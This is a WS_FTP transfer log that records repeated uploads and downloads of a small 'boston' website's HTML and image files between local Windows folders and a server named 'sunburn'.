10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
